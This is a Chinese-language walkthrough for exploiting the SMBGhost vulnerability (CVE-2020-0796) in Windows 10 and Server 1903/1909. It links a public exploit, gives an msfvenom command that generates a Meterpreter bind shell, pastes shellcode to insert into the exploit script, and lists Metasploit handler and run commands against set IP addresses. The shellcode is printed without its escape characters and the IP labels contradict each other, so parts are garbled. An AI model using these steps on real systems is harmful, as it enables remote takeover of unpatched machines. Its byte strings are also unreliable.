CVE-­2020­-0796（SMBGhost）漏洞利用

影響版本：

適用於32位系统的Windows 10版本1903

Windows 10 1903版

Windows Server 1903版

適用於32位系统的Windows 10版本1909

Windows 10版本1909

Windows 10 1909版

Windows Server版本1909

檢測工具：

https://github.com/ollypwn/SMBGhost

EXP：

https://github.com/chompie1337/SMBGhost_RCE_PoC

MSF利用：

msfvenom -p windows/x64/meterpreter/bind_tcp lport=1234 -f py -o shellcode.txt

將生成的shellcode替換exploit.py中的USER_PAYLOAD

USER_PAYLOAD =  b""
 | USER_PAYLOAD += b"xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41"
 | USER_PAYLOAD += b"x50x52x51x56x48x31xd2x65x48x8bx52x60x48"
 | USER_PAYLOAD += b"x8bx52x18x48x8bx52x20x48x8bx72x50x48x0f"
 | USER_PAYLOAD += b"xb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7c"
 | USER_PAYLOAD += b"x02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52"
 | USER_PAYLOAD += b"x41x51x48x8bx52x20x8bx42x3cx48x01xd0x8b"
 | USER_PAYLOAD += b"x80x88x00x00x00x48x85xc0x74x67x48x01xd0"
 | USER_PAYLOAD += b"x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56"
 | USER_PAYLOAD += b"x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9"
 | USER_PAYLOAD += b"x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0"
 | USER_PAYLOAD += b"x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58"
 | USER_PAYLOAD += b"x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44"
 | USER_PAYLOAD += b"x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0"
 | USER_PAYLOAD += b"x41x58x41x58x5ex59x5ax41x58x41x59x41x5a"
 | USER_PAYLOAD += b"x48x83xecx20x41x52xffxe0x58x41x59x5ax48"
 | USER_PAYLOAD += b"x8bx12xe9x57xffxffxffx5dx49xbex77x73x32"
 | USER_PAYLOAD += b"x5fx33x32x00x00x41x56x49x89xe6x48x81xec"
 | USER_PAYLOAD += b"xa0x01x00x00x49x89xe5x49xbcx02x00x7ax69"
 | USER_PAYLOAD += b"xc0xa8x8ex01x41x54x49x89xe4x4cx89xf1x41"
 | USER_PAYLOAD += b"xbax4cx77x26x07xffxd5x4cx89xeax68x01x01"
 | USER_PAYLOAD += b"x00x00x59x41xbax29x80x6bx00xffxd5x50x50"
 | USER_PAYLOAD += b"x4dx31xc9x4dx31xc0x48xffxc0x48x89xc2x48"
 | USER_PAYLOAD += b"xffxc0x48x89xc1x41xbaxeax0fxdfxe0xffxd5"
 | USER_PAYLOAD += b"x48x89xc7x6ax10x41x58x4cx89xe2x48x89xf9"
 | USER_PAYLOAD += b"x41xbax99xa5x74x61xffxd5x48x81xc4x40x02"
 | USER_PAYLOAD += b"x00x00x49xb8x63x6dx64x00x00x00x00x00x41"
 | USER_PAYLOAD += b"x50x41x50x48x89xe2x57x57x57x4dx31xc0x6a"
 | USER_PAYLOAD += b"x0dx59x41x50xe2xfcx66xc7x44x24x54x01x01"
 | USER_PAYLOAD += b"x48x8dx44x24x18xc6x00x68x48x89xe6x56x50"
 | USER_PAYLOAD += b"x41x50x41x50x41x50x49xffxc0x41x50x49xff"
 | USER_PAYLOAD += b"xc8x4dx89xc1x4cx89xc1x41xbax79xccx3fx86"
 | USER_PAYLOAD += b"xffxd5x48x31xd2x48xffxcax8bx0ex41xbax08"
 | USER_PAYLOAD += b"x87x1dx60xffxd5xbbxf0xb5xa2x56x41xbaxa6"
 | USER_PAYLOAD += b"x95xbdx9dxffxd5x48x83xc4x28x3cx06x7cx0a"
 | USER_PAYLOAD += b"x80xfbxe0x75x05xbbx47x13x72x6fx6ax00x59"
 | USER_PAYLOAD += b"x41x89xdaxffxd5"

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp


msf5 exploit(multi/handler) > set rhost 192.168.1.123 #目標IP


msf5 exploit(multi/handler) > set lport 1234


msf5 exploit(multi/handler) > exploit

後續：

進入EXP文件目錄，執行exp文件

python3 exploit.py ­ip 192.168.31.124 #本機IP